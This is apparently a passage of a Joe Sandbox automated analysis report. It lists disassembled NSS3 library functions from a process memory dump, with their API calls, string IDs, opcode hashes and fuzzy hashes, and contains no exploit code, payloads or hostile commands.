                                                                                  • Part of subcall function 6CFF9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CFF946B
                                                                                  • Part of subcall function 6CFF9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CFF9546
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFD8110
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6CFD811D
                                                                                • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CFD822D
                                                                                • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFD823C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                • String ID:
                                                                                • API String ID: 1923011919-0
                                                                                • Opcode ID: 93169f46af4cc258972e72111d59ab8f93ab5767a8b8c98b6dcd069c2669c529
                                                                                • Instruction ID: 39188d6c530e629e9be5eb0d5fdda60e85ee50f1a60f9113e795ce3ff1a82bc4
                                                                                • Opcode Fuzzy Hash: 93169f46af4cc258972e72111d59ab8f93ab5767a8b8c98b6dcd069c2669c529
                                                                                • Instruction Fuzzy Hash: 15C151B1D002599BEB21CF14CC44FDAB7B8EB05308F0581EAE919A7651E771AE85CF91
                                                                                Function 6D006C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CFB1C6F,00000000,00000004,?,?), ref: 6D006C3F
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CFB1C6F,00000000,00000004,?,?), ref: 6D006C60
                                                                                • PR_ExplodeTime.NSS3(00000000,6CFB1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CFB1C6F,00000000,00000004,?,?), ref: 6D006C94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                • API String ID: 3534712800-180463219
                                                                                • Opcode ID: c671b009387410b8282a52bae8b29e2dc6aa0eb81aa9c6d673742e38e432f8a5
                                                                                • Instruction ID: 9deed1c790e82ce3f5ec05c4b6fb300b655a89348b7661a53ce7212af898dcdd
                                                                                • Opcode Fuzzy Hash: c671b009387410b8282a52bae8b29e2dc6aa0eb81aa9c6d673742e38e432f8a5
                                                                                • Instruction Fuzzy Hash: 07513B72B015494BD70CCDADDC517DEB7DAABA4310F48C23AE442DB781D678D902C791
                                                                                Function 6D01BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D01BD48
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6D01BD68
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D01BD83
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6D01BD9E
                                                                                • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6D01BDB9
                                                                                • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6D01BDD0
                                                                                • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6D01BDEA
                                                                                • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6D01BE04
                                                                                • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6D01BE1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: AlgorithmPolicy
                                                                                • String ID:
                                                                                • API String ID: 2721248240-0
                                                                                • Opcode ID: 17bd3cd9c54a6bfc2ea525f9ab4fa43a1ea5899a9250868953b7ae12312f6da8
                                                                                • Instruction ID: 03727015eb8d22d987f4707369f4dbef1a1dd15de3ecec24f2e2e0ab1514e3dc
                                                                                • Opcode Fuzzy Hash: 17bd3cd9c54a6bfc2ea525f9ab4fa43a1ea5899a9250868953b7ae12312f6da8
                                                                                • Instruction Fuzzy Hash: 952151A6E0C25A57FB0046D69C42B6B76F4BB93749F050028FA16EF341F761942486A6
                                                                                Function 6D0C8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_CallOnce.NSS3(6D1114E4,6D07CC70), ref: 6D0C8D47
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C8D98
                                                                                  • Part of subcall function 6CFA0F00: PR_GetPageSize.NSS3(6CFA0936,FFFFE8AE,?,6CF316B7,00000000,?,6CFA0936,00000000,?,6CF3204A), ref: 6CFA0F1B
                                                                                  • Part of subcall function 6CFA0F00: PR_NewLogModule.NSS3(clock,6CFA0936,FFFFE8AE,?,6CF316B7,00000000,?,6CFA0936,00000000,?,6CF3204A), ref: 6CFA0F25
                                                                                • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D0C8E7B
                                                                                • htons.WSOCK32(?), ref: 6D0C8EDB
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C8F99
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C910A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                • String ID: %u.%u.%u.%u
                                                                                • API String ID: 1845059423-1542503432
                                                                                • Opcode ID: 2f967f2c81668c21a77052e99333cdea1d265a862c252f95789b63f1b004d9e2
                                                                                • Instruction ID: 1089527e0725a5129f53d7e6a3d8b4a51741e364d9c61e790631286d3ffff865
                                                                                • Opcode Fuzzy Hash: 2f967f2c81668c21a77052e99333cdea1d265a862c252f95789b63f1b004d9e2
                                                                                • Instruction Fuzzy Hash: 6B0278319042568FEB19CF19C8697BEBBF2EF86308F09C25ADC915B291C335D985C792
                                                                                Function 6D089D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CF48637,?,?), ref: 6D089E88
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CF48637), ref: 6D089ED6
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D089EC0
                                                                                • database corruption, xrefs: 6D089ECA
                                                                                • %s at line %d of [%.10s], xrefs: 6D089ECF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 912837312-598938438
                                                                                • Opcode ID: 03e0a67e9316f3695170c7d2eee3b28685c0502946299a2e8874ca0abc5c21ea
                                                                                • Instruction ID: a2c0fbe25988b8b8d5cc29f4ae68be61d06517921e0748923c37c7118a2f95da
                                                                                • Opcode Fuzzy Hash: 03e0a67e9316f3695170c7d2eee3b28685c0502946299a2e8874ca0abc5c21ea
                                                                                • Instruction Fuzzy Hash: D8819471B0020A8FEF04DFAAD980BEEB7F6BF48304B558169D915AB242D770DE45CB50
                                                                                Function 6D0CCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0CD086
                                                                                • PR_Malloc.NSS3(00000001), ref: 6D0CD0B9
                                                                                • PR_Free.NSS3(?), ref: 6D0CD138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: FreeMallocstrlen
                                                                                • String ID: >
                                                                                • API String ID: 1782319670-325317158
                                                                                • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                • Instruction ID: 5e5d145e8cabd1fa7f907636503c7f8491e1b233cc1de4a4e4cbc02f52832863
                                                                                • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                • Instruction Fuzzy Hash: 09D13862B946470BFB15497D88A13EE77D397C2370F984329D9219B3E5E639C8838327
                                                                                Function 6D04DC60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_FreeSymKey.NSS3(00000002,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,00000002,?), ref: 6D04DD05
                                                                                • PR_SetError.NSS3(FFFFD0AB,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6D04DDCD
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                  • Part of subcall function 6D027F90: PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6D027FB2
                                                                                  • Part of subcall function 6D027F90: PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6D027FD4
                                                                                  • Part of subcall function 6D027F90: PR_ExitMonitor.NSS3(?), ref: 6D02801B
                                                                                • PR_SetError.NSS3(FFFFD0AB,00000000), ref: 6D04DDE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$Error$CountEnterEntryExitFreeK11_Value
                                                                                • String ID: traffic upd
                                                                                • API String ID: 1369763343-79366657
                                                                                • Opcode ID: 4c5dd4bae58de2f6c782c27f39fe99c525122a50eb6da1172fba98f6bce8cb5f
                                                                                • Instruction ID: b2a8edb157126f7e2b7e5ff95a34c3ee0304c0eabb70f6a40cdf5b05f9681540
                                                                                • Opcode Fuzzy Hash: 4c5dd4bae58de2f6c782c27f39fe99c525122a50eb6da1172fba98f6bce8cb5f
                                                                                • Instruction Fuzzy Hash: 8641E4B1A006059BE714DB69DC81FAFB7F5EBC8304F51442DE50A97250D771A912CBA1
                                                                                Function 6D06AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bfecb8474f1ee86b3b866b95141c2bdad55f2d20017f5c628724145b28dad7a9
                                                                                • Instruction ID: 1b089cc1b6cd3dc9ea8049198f493b13ff934bcdc1db442ecb98b246e38847cc
                                                                                • Opcode Fuzzy Hash: bfecb8474f1ee86b3b866b95141c2bdad55f2d20017f5c628724145b28dad7a9
                                                                                • Instruction Fuzzy Hash: 64F107B1E002668FEB04EF69E9417B9B7F5BB4A304F14812DD915D7344EBF09A81CB91
                                                                                Function 6D080C40 Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad15ec9abb4890ec99d04411fa65f03c5fcc96dbd3378b8e4e7d1ad6336c0a29
                                                                                • Instruction ID: 4b3fbb91bd24ec6ff8bf7a9522dad719c084cc20ea6cd3cb4ac34115fd2b7d8a
                                                                                • Opcode Fuzzy Hash: ad15ec9abb4890ec99d04411fa65f03c5fcc96dbd3378b8e4e7d1ad6336c0a29
                                                                                • Instruction Fuzzy Hash: 7D1191756093069FEB00DF19D8807AA77A5FF85364F14C06DD8198B342DB72E906CBA0
                                                                                Function 6D080D60 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                • Instruction ID: d4b5e98607ac367f87863c333c1f28352e5bfd9e9e9b3caa5b51f4e0878654e3
                                                                                • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                • Instruction Fuzzy Hash: 3FE06D3AA0A215A7EF148E0AC450BA97BD9EF85615FA4C479EC599B602D633F8038781
                                                                                Function 6CFACC60 Relevance: .0, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be0e894fbe6c8cfda4a5619a4cde25ce9d560b4aa9a8c6bd5aeef7ead1cd305d
                                                                                • Instruction ID: d4d5c8f1d1defa01c541683b77dfa215199c2d148daba0487846a4b4ae7d59fa
                                                                                • Opcode Fuzzy Hash: be0e894fbe6c8cfda4a5619a4cde25ce9d560b4aa9a8c6bd5aeef7ead1cd305d
                                                                                • Instruction Fuzzy Hash: 9AC09238244708CFC704DF49E98AEA43BF8FF0DA507040094EA028B721DB71FC00CA80
                                                                                Function 6D015DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6D015E08
                                                                                • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D015E3F
                                                                                • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6D015E5C
                                                                                • free.MOZGLUE(00000000), ref: 6D015E7E
                                                                                • free.MOZGLUE(00000000), ref: 6D015E97
                                                                                • PORT_Strdup_Util.NSS3(secmod.db), ref: 6D015EA5
                                                                                • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6D015EBB
                                                                                • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D015ECB
                                                                                • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6D015EF0
                                                                                • free.MOZGLUE(00000000), ref: 6D015F12
                                                                                • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6D015F35
                                                                                • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6D015F5B
                                                                                • free.MOZGLUE(00000000), ref: 6D015F82
                                                                                • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6D015FA3
                                                                                • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6D015FB7
                                                                                • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6D015FC4
                                                                                • free.MOZGLUE(00000000), ref: 6D015FDB
                                                                                • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D015FE9
                                                                                • free.MOZGLUE(00000000), ref: 6D015FFE
                                                                                • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6D01600C
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D016027
                                                                                • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6D01605A
                                                                                • PR_smprintf.NSS3(6D0EAAF9,00000000), ref: 6D01606A
                                                                                • free.MOZGLUE(00000000), ref: 6D01607C
                                                                                • free.MOZGLUE(00000000), ref: 6D01609A
                                                                                • free.MOZGLUE(00000000), ref: 6D0160B2
                                                                                • free.MOZGLUE(?), ref: 6D0160CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                • API String ID: 1427204090-154007103
                                                                                • Opcode ID: e17c174661a6ad5af31de09f13d8dc982fce9e0c496d238c8f4a7b7a5e4cd264
                                                                                • Instruction ID: 46fea5d02ede00296618791eb0d66747dbf061f4a34f05e67e0d9ac72be8b155
                                                                                • Opcode Fuzzy Hash: e17c174661a6ad5af31de09f13d8dc982fce9e0c496d238c8f4a7b7a5e4cd264
                                                                                • Instruction Fuzzy Hash: 3F91E5B8D082069FFB018FA5AC85BBF3BF4AF06248F440064EC599F242E761D955C7A2
                                                                                Function 6CFA1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_NewLock.NSS3 ref: 6CFA1DA3
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CFA1DB2
                                                                                  • Part of subcall function 6CFA1240: TlsGetValue.KERNEL32(00000040,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1267
                                                                                  • Part of subcall function 6CFA1240: EnterCriticalSection.KERNEL32(?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA127C
                                                                                  • Part of subcall function 6CFA1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA1291
                                                                                  • Part of subcall function 6CFA1240: PR_Unlock.NSS3(?,?,?,?,6CFA116C,NSPR_LOG_MODULES), ref: 6CFA12A0
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFA1DD8
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CFA1E4F
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CFA1EA4
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CFA1ECD
